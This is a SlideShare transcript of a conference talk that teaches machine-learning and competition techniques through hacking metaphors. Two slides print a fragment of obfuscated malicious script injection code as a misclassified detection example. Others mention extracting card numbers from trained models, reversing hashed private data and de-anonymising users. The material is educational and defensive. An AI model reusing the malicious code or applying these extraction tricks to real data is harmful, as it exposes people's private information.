SlideShare a Scribd company logo
Hacking Predictive Modeling
HJ van Veen - Data Science & InfoSec @ Nubank
2
“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich

Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank

• Competitive data science fanatic

• Horrible Portuguese speaker (more so with public
speaking). Questions and clarifications in English please.

• @mlwave
Disclaimer
• These slides are for entertainment, educational and
research purposes only.

• ML is powerful and easy: “Como toda descoberta científica
dá mais poderes sobre a natureza, ela pode aumentar o bem
ou o mal.” - César Lattes

• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users.



acm.org/code-of-ethics
Scope
• This presentation will be all over the place. I don’t know if
you never trained a model before, or are experienced with
ML.

• But I hope this presentation will be interesting for the
hackers, makers, creators of all types.

• Catch me afterwards, if you want to talk about hyper
optimization.

What is AI?
What is AI?
Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
What is AI?
What is AI?
Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.)
Boy holds baseball bat Cat sits on couch
What is AI?
• AI grew out of Operations Research after WWII

• AI consists of many diverse subfields ranging from:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy,
Machine Learning.
• Fight hype. Just replace word `AI` with `Software`: If result
sounds silly or obvious, then the application of AI usually is
too. Power word: “What is your false positive rate?”.


What is Machine Learning?
• Automatically learn from data

• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classification). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling.

Why Software Is Eating the World (2016, Andreessen Horowitz)
What is Predictive Modeling?
• Puts the focus on creating predictions:

• Use of model,
• how to use the data,
• how to get good accuracy.

• Essential to create a first solution. But the bare minimum to
what goes into Machine Learning at commercial scale. ML
competitions are largely about predictive modeling.
Useful Paradigms
• Functionalism: Input -> Function -> Output

• Connectionism: Learn from data bottom-up, not top-down
by stacking learning primitives.

• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does.

• Coding Theory: Error detection and compression
Functionalism
• Philosophy of Mind: Mental states are defined by how they
function, not defined by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal.

• Perhaps we can model functional intelligence with
computers too?



Functionalism
Transform Model OutputInput
Reality Sensory Processing Mental Modeling Behavior
Data Feature Engineering Predictive Modeling Predictions
Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure.

• Artificial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning

• Perhaps we can model intelligence with network
architectures too?



Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
Connectionism
Decision Demons
Cognitive Demons
Feature Demons
Image Demons
Pandemonium: A paradigm for learning. (Selfridge, 1959)
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
• Don’t care if there is a magical deamon or a complex
maths formula in the box.
• Question then becomes: How to transform the data, how
to parametrize the black box, so to get the best
predictions?
• Remember: Garbage in - Garbage out (Don’t trust for
critical stuff like healthcare or self-driving cars or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about finding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about finding the most
relevant patterns.
Coding Theory
1 MegaByte 180 KiloByte
Data
• Data can be structured or unstructured.
• Tabular data is structured and can more readily be used

• Text and Sound and Images are unstructured

• Data can be temporal, for instance: time-series

• Rarely, data is in shape of a graph (for instance, relations
between gang members)
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

Transform Model OutputInput
Data Feature Engineering Predictive Modeling Predictions
Feature Engineering
• Most data needs to be converted to numbers first

• Feature engineering:

• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well.

Feature Extraction - Foundations and Applications (Guyon et al., 2006)
Feature Engineering: Tricks
• Categorical Variables

• One-hot encoding for neural nets:





• Label encoding for decision trees:
Red
Green
Blue
1
2
3
Red
Green
Blue
Red Green Blue
1 0 0
0 1 0
0 0 1
Feature Engineering: Tricks
• That’s really (mostly) it!

• You can now apply the most advanced machine learning
algorithms to data and something you want to predict.

• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools).

Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.
Transform Model OutputInput
Data Feature Engineering Predictive Modeling Predictions
Modeling
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Modeling
Gender Likes Open Source? Wants RoadSec ticket?
0 1 ?
• Gender did not show any correlation and 3/4 of people
who Likes Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.
Modeling
• What model do you use for data? 

• Tabular data: Gradient boosted decision trees (XGBoost)

• Images: Pre-trained deep neural net (or Detectron)

• Text: TFIDF -> Logistic Regression (or FastText, ULMNet,
BERT)
Search for above terms in combination with “machine learning”
Evaluation
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Evaluation
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Train
Predict
The Elements of Statistical Learning (2001, Friedman et al.)
Evaluation
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Train
Predict
Evaluation
Predictions Wants RoadSec ticket?
1 1
1 1
1 0
1 1
0 0
0 0
0 0
0 0
7/8 Accuracy Score
Optimization
• A Python classifier may look like:



FactorizationMachineBinaryClassifier(iters=5,
learning_rate=0.1, latent_dim=20, radius=0.5,

lambda_linear=0.0001, lambda_latent=0.0001,
normalize='Auto', norm=True, caching='Auto',
shuffle=True, verbose=True)
Trick is to tweak these parameters to get a better evaluation.
Then stop when any change makes evaluation worse.
Brute Forcing
• View hyper parameter optimization as a password
cracking task

• Enumerate or randomly try all possible parameters within a
range.

• Dictionary attack: Use “password dictionary files” with good
parameters that worked on other problems. Try these first.

• This is basically Random Search or Adaptive Search

Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
Brute Forcing
• How to find the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights?

• How about trying every possible combination of weights
and pick the best evaluation? Worst case: you spend 2
hours more compute.

KazAnova@kaggle
Brute Forcing
• Do we really need to manually train all these models?

• What would happen if we automatically train a 1000
random models with random data transformations and
throw them all into another black box?

• Out comes a winning Kaggle submission…


Kaggle Ensembling Guide (van Veen et al., 2015)
Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on test set.

• For every column in test set:
• randomly shuffle the column
• Evaluate the new predictions
• If evaluation is better with randomly shuffled features,
then you can safely discard the column.

 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.
Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• ML Community is incentivized
to share easy-replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?

Warez
• Good tools: 

• allow you to experiment and iterate quickly

• have an active community contributing new features

• can be applied to many different problems with similar
results.

• abstract away complexity.

Python
• Grown to be essential to data science and machine
learning. 

• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code

PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
Python
from sklearn import datasets, ensemble
iris = datasets.load_iris()
X = iris.data
y = iris.target
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
p = model.predict(X)

Scikit-Learn
• The Metasploit of Machine Learning

• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models)

• Could get by for a while learning only this library very well

Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
XGBoost
• The best for tabular data: 

• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API

• Alternatives: GradientBoostingClassifier, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
Keras
User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning.

• Alternatives: PyTorch with Fast.AI library



Deep Learning with Python (Chollet, 2017)
Vowpal Wabbit
• Very fast online learning on data bigger than memory

Can be faster and more accurate than Hadoop/Spark
• Uses cool hashing trick inspired by Bloom filter
• Support for contextual bandits (automated decision
making)
• Eat raw features:
• 1 '10000074 |f category_x_transport emails_cnt:0.0
emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii
exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas

• Fast, scalable and supports many types of data

• Perform vector operations on NumPy (or Numba) arrays

• Wide support for scientific calculations


Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form.

• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF

• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->

State:New_York
Tricks as seen on the Kaggle forums
Reverse Engineering
• Use model predictions to reverse engineer the training
data.

• Simple brute-force can use fitted language models to
retrieve:
• Credit Card Numbers
• Social Security Numbers / CPF’s
• if it has seen this before once (DL is good at
memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
Social Engineering
• You can not survive in most business
with just predictive modeling.

• Companies don’t hire an AutoML
solution, they hire people.

• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.
Social Engineering
• How to gain access to online data science community?

• Compete together.
• Write a cool blog about it.
• Write/contribute Open Source projects.
• Write tutorials/step-by-step’s.

• Basically share everything: A 100-line Python script (toy
wrapper for Regularized Greedy Forest) could grow to a
professional project that you now can use yourself.
https://github.com/RGF-team/rgf
Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor

• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show not tell: Save your most powerful models ‘till the
very last
Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard?

• Wacky Boosting:
• Keep changing your submission
• use leaderboard feedback to see if it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1

• Will horribly overfit, but can also cause others to overfit!
Competing in a data science contest without reading the data (2015, Hardt)
Information Snooping
• Normally not advisable to use the test set. But for
competitions the test is available, so:

• Can use semi-supervised learning to extract information
from the test set. Use test set for:

• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding confident predictions as labels to train set
github.com/gatapia Guido Tapia
Rainbow tables
• Sometimes categorical variables are hashed to obscure
them.

• Can use rainbow tables to reverse (truncated) MD5 hash
and get the original feature.

• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!
Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold!

• Local evaluation is your lifeline.

• Try everything, keep the good.

• Once I got an accuracy of 181% by
submitting correct answers twice.
Statisticians
Machine Learners
Smart
Machine Learner
(The joke is that there are only smart statisticians)
CV
Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
DataLeaks
• A very common mistake. Can be deadly for business and
science, so become good at finding leaks.
• The task was to predict cancer. One of the variables was
“underwent surgery for cancer, yes/no?”
• You can not use data that is not reasonably available at
test time (or your lifeline evaluation can not be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
DataLeaks
• Beware: The more powerful your model, the bigger chance
for exploiting any leakage left that you did not find.
• Most powerful model is a 1000 data scientists on a
typewriter, so that’s why competitions see larger leakage
discovery.

• A large sample of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle
DataLeaks
• Winners of Microsoft malware binary classification 2015
were able to extract the desktop icon from the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
Sub-Linear Debugging
• Output information while your computations are running,
essential for iteration speed:
• Can spot very fast if some change was good or bad.
• Feels like NEO in the Matrix if you do this with the data
itself during data reading.
• Can spot data health issues (text encoding errors, all
missing in the same row of data, etc.)
Online Learning and Sub-Linear Debugging (Mineiro, 2014)
Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix it by creating new features
• Below sample confidently predicted as minified JS when it
was actually obfuscated malicious JS:











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js
Error Debugging
• How to fix?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters











4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Dumpster Diving
• You should find out the sources and shapes of all your
data, then do a deep dive:

• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonimize users and obtain the ground truth.

• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth.



Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)
Adversarial Input
• These people are invisible to % of modern face detection
CV Dazzle (Harvey et al., 2010)
Adversarial Input
• This image is confusing to modern object detection
“A foreign attack
helicopter firing missiles”
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable.

• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge
Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible or
more patient?
• Do you memorize your victim’s personal details?



Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check for how long user spend in funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)
Botnet
• Much of commercial ML can or is being automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Thinking back to the ID fraudster example. Can you
imagine how to cheat a ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
Case Study: Higgs Boson
• “A ciência não pode prever o que vai acontecer. Só pode
prever a probabilidade de algo acontecer.” - César Lattes

• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise)

• No knowledge of particle physics is required.

• XGBoost was a 0-day during competition (This could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)
Case Study: Higgs Boson
• Lets hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick best log loss model and lower the learning rate and
use early stopping to find the best amount of trees.
• Repeat above 3 times and average results
Position: 30/1785
Further Learning
• MOOC’s: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science Coursera, Abu-Mustafa Caltech
Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find cool professor and study their online output
nubank.workable.com
Nubank is
hiring!

More Related Content

What's hot

Xgboost
XgboostXgboost
Feature Engineering
Feature EngineeringFeature Engineering
Feature Engineering
Sri Ambati
 
Tips and tricks to win kaggle data science competitions
Tips and tricks to win kaggle data science competitionsTips and tricks to win kaggle data science competitions
Tips and tricks to win kaggle data science competitions
Darius Barušauskas
 
Tda presentation
Tda presentationTda presentation
Tda presentation
HJ van Veen
 
Feature Engineering - Getting most out of data for predictive models
Feature Engineering - Getting most out of data for predictive modelsFeature Engineering - Getting most out of data for predictive models
Feature Engineering - Getting most out of data for predictive models
Gabriel Moreira
 
Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...
Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...
Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...
Simplilearn
 
How to Win Machine Learning Competitions ?
How to Win Machine Learning Competitions ? How to Win Machine Learning Competitions ?
How to Win Machine Learning Competitions ?
HackerEarth
 
Beyond Churn Prediction : An Introduction to uplift modeling
Beyond Churn Prediction : An Introduction to uplift modelingBeyond Churn Prediction : An Introduction to uplift modeling
Beyond Churn Prediction : An Introduction to uplift modeling
Pierre Gutierrez
 
Model selection and tuning at scale
Model selection and tuning at scaleModel selection and tuning at scale
Model selection and tuning at scale
Owen Zhang
 
Feature selection
Feature selectionFeature selection
Feature selection
Dong Guo
 
Automated Machine Learning
Automated Machine LearningAutomated Machine Learning
Automated Machine Learning
safa cimenli
 
Feature Engineering
Feature Engineering Feature Engineering
Feature Engineering
odsc
 
Recommendation System Explained
Recommendation System ExplainedRecommendation System Explained
Recommendation System Explained
Crossing Minds
 
Explainable AI - making ML and DL models more interpretable
Explainable AI - making ML and DL models more interpretableExplainable AI - making ML and DL models more interpretable
Explainable AI - making ML and DL models more interpretable
Aditya Bhattacharya
 
Ensemble learning Techniques
Ensemble learning TechniquesEnsemble learning Techniques
Ensemble learning Techniques
Babu Priyavrat
 
Introduction to XGBoost
Introduction to XGBoostIntroduction to XGBoost
Introduction to XGBoost
Joonyoung Yi
 
Feature Engineering for ML - Dmitry Larko, H2O.ai
Feature Engineering for ML - Dmitry Larko, H2O.aiFeature Engineering for ML - Dmitry Larko, H2O.ai
Feature Engineering for ML - Dmitry Larko, H2O.ai
Sri Ambati
 
Explainable Machine Learning (Explainable ML)
Explainable Machine Learning (Explainable ML)Explainable Machine Learning (Explainable ML)
Explainable Machine Learning (Explainable ML)
Hayim Makabee
 
XGBoost @ Fyber
XGBoost @ FyberXGBoost @ Fyber
XGBoost @ Fyber
Daniel Hen
 
Overview of tree algorithms from decision tree to xgboost
Overview of tree algorithms from decision tree to xgboostOverview of tree algorithms from decision tree to xgboost
Overview of tree algorithms from decision tree to xgboost
Takami Sato
 

What's hot (20)

Xgboost
XgboostXgboost
Xgboost
 
Feature Engineering
Feature EngineeringFeature Engineering
Feature Engineering
 
Tips and tricks to win kaggle data science competitions
Tips and tricks to win kaggle data science competitionsTips and tricks to win kaggle data science competitions
Tips and tricks to win kaggle data science competitions
 
Tda presentation
Tda presentationTda presentation
Tda presentation
 
Feature Engineering - Getting most out of data for predictive models
Feature Engineering - Getting most out of data for predictive modelsFeature Engineering - Getting most out of data for predictive models
Feature Engineering - Getting most out of data for predictive models
 
Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...
Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...
Decision Tree Algorithm With Example | Decision Tree In Machine Learning | Da...
 
How to Win Machine Learning Competitions ?
How to Win Machine Learning Competitions ? How to Win Machine Learning Competitions ?
How to Win Machine Learning Competitions ?
 
Beyond Churn Prediction : An Introduction to uplift modeling
Beyond Churn Prediction : An Introduction to uplift modelingBeyond Churn Prediction : An Introduction to uplift modeling
Beyond Churn Prediction : An Introduction to uplift modeling
 
Model selection and tuning at scale
Model selection and tuning at scaleModel selection and tuning at scale
Model selection and tuning at scale
 
Feature selection
Feature selectionFeature selection
Feature selection
 
Automated Machine Learning
Automated Machine LearningAutomated Machine Learning
Automated Machine Learning
 
Feature Engineering
Feature Engineering Feature Engineering
Feature Engineering
 
Recommendation System Explained
Recommendation System ExplainedRecommendation System Explained
Recommendation System Explained
 
Explainable AI - making ML and DL models more interpretable
Explainable AI - making ML and DL models more interpretableExplainable AI - making ML and DL models more interpretable
Explainable AI - making ML and DL models more interpretable
 
Ensemble learning Techniques
Ensemble learning TechniquesEnsemble learning Techniques
Ensemble learning Techniques
 
Introduction to XGBoost
Introduction to XGBoostIntroduction to XGBoost
Introduction to XGBoost
 
Feature Engineering for ML - Dmitry Larko, H2O.ai
Feature Engineering for ML - Dmitry Larko, H2O.aiFeature Engineering for ML - Dmitry Larko, H2O.ai
Feature Engineering for ML - Dmitry Larko, H2O.ai
 
Explainable Machine Learning (Explainable ML)
Explainable Machine Learning (Explainable ML)Explainable Machine Learning (Explainable ML)
Explainable Machine Learning (Explainable ML)
 
XGBoost @ Fyber
XGBoost @ FyberXGBoost @ Fyber
XGBoost @ Fyber
 
Overview of tree algorithms from decision tree to xgboost
Overview of tree algorithms from decision tree to xgboostOverview of tree algorithms from decision tree to xgboost
Overview of tree algorithms from decision tree to xgboost
 

Similar to Hacking Predictive Modeling - RoadSec 2018

ML crash course
ML crash courseML crash course
ML crash course
mikaelhuss
 
NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk
Vijay Ganti
 
NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk
Vijay Ganti
 
Deep learning with tensorflow
Deep learning with tensorflowDeep learning with tensorflow
Deep learning with tensorflow
Charmi Chokshi
 
lec1.ppt
lec1.pptlec1.ppt
lec1.ppt
SVasuKrishna1
 
Lecture 1
Lecture 1Lecture 1
Lecture 1
Aun Akbar
 
Ml masterclass
Ml masterclassMl masterclass
Ml masterclass
Maxwell Rebo
 
Choosing a Machine Learning technique to solve your need
Choosing a Machine Learning technique to solve your needChoosing a Machine Learning technique to solve your need
Choosing a Machine Learning technique to solve your need
GibDevs
 
machine learning
machine learningmachine learning
machine learning
soundaryasarya
 
Human in the loop: Bayesian Rules Enabling Explainable AI
Human in the loop: Bayesian Rules Enabling Explainable AIHuman in the loop: Bayesian Rules Enabling Explainable AI
Human in the loop: Bayesian Rules Enabling Explainable AI
Pramit Choudhary
 
Data science presentation
Data science presentationData science presentation
Data science presentation
MSDEVMTL
 
Machine learning by prity mahato
Machine learning by prity mahatoMachine learning by prity mahato
Machine learning by prity mahato
Prity Mahato
 
Defcon 21-pinto-defending-networks-machine-learning by pseudor00t
Defcon 21-pinto-defending-networks-machine-learning by pseudor00tDefcon 21-pinto-defending-networks-machine-learning by pseudor00t
Defcon 21-pinto-defending-networks-machine-learning by pseudor00t
pseudor00t overflow
 
Deep learning introduction
Deep learning introductionDeep learning introduction
Deep learning introduction
Adwait Bhave
 
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
Alok Singh
 
Demystifying Machine Learning
Demystifying Machine LearningDemystifying Machine Learning
Demystifying Machine Learning
Ayodele Odubela
 
Engineering Intelligent Systems using Machine Learning
Engineering Intelligent Systems using Machine Learning Engineering Intelligent Systems using Machine Learning
Engineering Intelligent Systems using Machine Learning
Saurabh Kaushik
 
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Sri Ambati
 
Machine learning a developer's perspective
Machine learning   a developer's perspectiveMachine learning   a developer's perspective
Machine learning a developer's perspective
Rupak Chakraborty
 
Core Methods In Educational Data Mining
Core Methods In Educational Data MiningCore Methods In Educational Data Mining
Core Methods In Educational Data Mining
ebelani
 

Similar to Hacking Predictive Modeling - RoadSec 2018 (20)

ML crash course
ML crash courseML crash course
ML crash course
 
NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk
 
NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk NLP & Machine Learning - An Introductory Talk
NLP & Machine Learning - An Introductory Talk
 
Deep learning with tensorflow
Deep learning with tensorflowDeep learning with tensorflow
Deep learning with tensorflow
 
lec1.ppt
lec1.pptlec1.ppt
lec1.ppt
 
Lecture 1
Lecture 1Lecture 1
Lecture 1
 
Ml masterclass
Ml masterclassMl masterclass
Ml masterclass
 
Choosing a Machine Learning technique to solve your need
Choosing a Machine Learning technique to solve your needChoosing a Machine Learning technique to solve your need
Choosing a Machine Learning technique to solve your need
 
machine learning
machine learningmachine learning
machine learning
 
Human in the loop: Bayesian Rules Enabling Explainable AI
Human in the loop: Bayesian Rules Enabling Explainable AIHuman in the loop: Bayesian Rules Enabling Explainable AI
Human in the loop: Bayesian Rules Enabling Explainable AI
 
Data science presentation
Data science presentationData science presentation
Data science presentation
 
Machine learning by prity mahato
Machine learning by prity mahatoMachine learning by prity mahato
Machine learning by prity mahato
 
Defcon 21-pinto-defending-networks-machine-learning by pseudor00t
Defcon 21-pinto-defending-networks-machine-learning by pseudor00tDefcon 21-pinto-defending-networks-machine-learning by pseudor00t
Defcon 21-pinto-defending-networks-machine-learning by pseudor00t
 
Deep learning introduction
Deep learning introductionDeep learning introduction
Deep learning introduction
 
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
Big Data Spain 2018: How to build Weighted XGBoost ML model for Imbalance dat...
 
Demystifying Machine Learning
Demystifying Machine LearningDemystifying Machine Learning
Demystifying Machine Learning
 
Engineering Intelligent Systems using Machine Learning
Engineering Intelligent Systems using Machine Learning Engineering Intelligent Systems using Machine Learning
Engineering Intelligent Systems using Machine Learning
 
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
Machine Learning Interpretability - Mateusz Dymczyk - H2O AI World London 2018
 
Machine learning a developer's perspective
Machine learning   a developer's perspectiveMachine learning   a developer's perspective
Machine learning a developer's perspective
 
Core Methods In Educational Data Mining
Core Methods In Educational Data MiningCore Methods In Educational Data Mining
Core Methods In Educational Data Mining
 

Recently uploaded

Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
